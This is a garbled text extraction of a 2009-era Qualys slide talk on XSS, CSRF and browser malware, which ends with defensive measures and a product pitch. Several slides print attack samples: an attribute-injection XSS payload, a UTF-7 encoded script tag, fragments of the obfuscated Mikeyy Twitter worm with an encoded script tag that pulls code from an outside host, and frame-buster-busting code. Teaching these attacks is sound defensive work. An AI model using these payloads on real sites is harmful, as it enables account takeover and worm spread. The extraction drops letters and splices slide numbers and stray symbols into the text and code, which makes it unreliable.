when html goes bad

8/2/2019 When HTML Goes Bad

1/22

When HTML Goes BadInside XSS, CSRF, and Malware...

Mike ShemaSecurity Research Engineer, Qualys Inc.


2/22

When HTML Goes Bad

XSS (HTML injection)

CSRF HTTP actuation

2

Malware (game over...)


3/22

Money Attacks refocus from web server to

web browser via the web application

Compromise the web application in order

3

o use as a e very mec an sm Infect rather than deface

Automated SQL injection attacks infected

tens of thousands of web sites


4/22

Us and Them

...exploit the system

to gain adminaccess

Requires shell code

...exploit the browser

No shell code required

Access financialinformation

4

Install keylogger, networksniffer, botnet

Search for documents,credentials,

Access e-mail

Access social network


5/22

Poles Apart Desktop

Access controls

Processseparation

Browser

Same Origin Policy

Blocks pop-ups

-

5

Anti-virus

cookies Tabs!

Database (HTML5)


6/22

Safe Links?

http://bit.ly/2z3MBj http://bit.ly/z18Rv

http://bit.ly/OApJX

6

http://bit.ly/lSxst http://bit.ly/wszWO

http://bit.ly/A6Ca

http://tinyurl.com/6q2ab9


7/22

Infection


8/22

Behind the Scenes

http://website/page.cgi?user=MachineWelcome to the Machine...

8

http://website/page.cgi?user=...Welcome to the ......


9/22

Behind the Scenes

http://website/page.cgi?redirect=http://website/otherpage.html

Welcome to the Machinelink...

9

http://website/page.cgi?redirect=+onclick=alert(echoes);a=Welcome to the Machine

link...


10/22

So You Think You Can Tell...

+ADw-script+AD4-

10

orem psem .source


11/22

Careful With That AJAX, Eugenevar _0xc26a = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP", "connect","toUpperCase", "GET", "?", "open", "", "Method", "POST ", " HTTP/1.1","setRequestHeader", "Content-Type", "application/x-www-form-urlencoded",

"onreadystatechange", "readyState", "send", "split", "join", "'", "%27", "(", "%28",")", "%29", "*", "%2A", "~", "%7E", "!", "%21", "%20", "+", "%", "replace","innerHTML", "documentElement", "exec", "Twitter should really fix this...Mikeyy", "I am done... Mikeyy", "Mikeyy is done..", "Twitter please fix this,regards Mikeyy", "random", "length", "floor", "mikeyy:)"

11

.

%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%6a%73%78%73%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));


12/22

XSS

Character encoding Valid, but unexpected

Invalid but rendered

12

Payload encoding JavaScript obfuscation

Browser-specific quirk


13/22

Unusual Suspects

Flash

PDF

Images

13

Browser quirks


14/22

Where Are the Worms?

MySpace (old, so very, very old) Twitter

No lar e web a worm has been trul

14

weaponized


15/22

CSRF

Taking advantage of the design ofHTML & HTTP

Forcing state onto a non-stateful

15

transport Forced workflows


16/22

Frame Busting if (top != self) { top.location.replace(self.location.href); }

var prevent_bust = 0;window.onbeforeunload = function(){ prevent_bust++ }setInterval(function() {if (prevent_bust > 0) {prevent_bust -= 2;

'

16

. . - - - -

204.com'}}, 1)

http://www.codinghorror.com/blog/archives/001277.html

http://stackoverflow.com/questions/958997/frame-buster-buster-buster-code-needed


17/22


18/22

Bricks in the Wall

Coding practices Frameworks

Libraries

18

. Rectify vs. reject

Inoculation


19/22

Another Brick in the Wall

User base xssed, ha.ckers.org

Web application scanners

19

Source code scanners


20/22

Browser Evolution Move more countermeasures into

the browser Process isolation

Anti-XSS

20

Anti-CSRF Behavioral anti-virus


21/22

A New Machine

HTML5

Cross-document messaging a.k.a. SomeOther Origins, Too

Database

21

Expanding the attack surface Increasing the information store


22/22

Thank You!

During Live PresentationPlease Use Your WebExQ&A Panel to Submit Questions

22

To Request a 14-day Free Trialof our Web Application Scanning Solution, email:

[email protected]

when html goes bad

Documents